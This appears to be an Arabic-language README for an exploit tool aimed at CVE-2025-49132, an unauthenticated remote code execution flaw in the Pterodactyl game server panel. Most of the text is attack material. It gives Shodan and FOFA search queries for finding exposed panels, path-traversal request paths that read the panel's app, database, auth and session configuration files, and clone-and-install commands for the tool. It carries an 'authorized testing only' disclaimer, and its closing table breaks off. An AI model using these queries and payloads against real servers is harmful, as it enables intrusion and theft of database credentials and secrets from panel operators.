
أداة استغلال لـ CVE-2025-49132، وهي ثغرة RCE غير مصادق عليها حرجة في لوحات خوادم ألعاب Pterodactyl. تتضمن استعلامات استطلاعية وحمولات لاختبار الاختراق المصرح به.
أداة استغلال لـ CVE-2025-49132 — ثغرة حرجة غير مصادق عليها لتنفيذ الأكواد التعسفية تؤثر على لوحة تحكم خادم الألعاب Pterodactyl.
ثغرة ACE حرجة في لوحة Pterodactyl تسمح للمهاجمين عن بعد بدون مصادقة بتنفيذ أكواد تعسفية — مما قد يؤدي إلى اختراق كامل للنظام.
لا حاجة للمصادقة. فقط نسخة ضعيفة.
لأغراض تعليمية واختبار اختراق مصرح به فقط.
Shodan
http.title:"Pterodactyl"
FOFA
"Pterodactyl"
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
| البرنامج | الحالة |
|---|---|
| Pterodactyl Panel |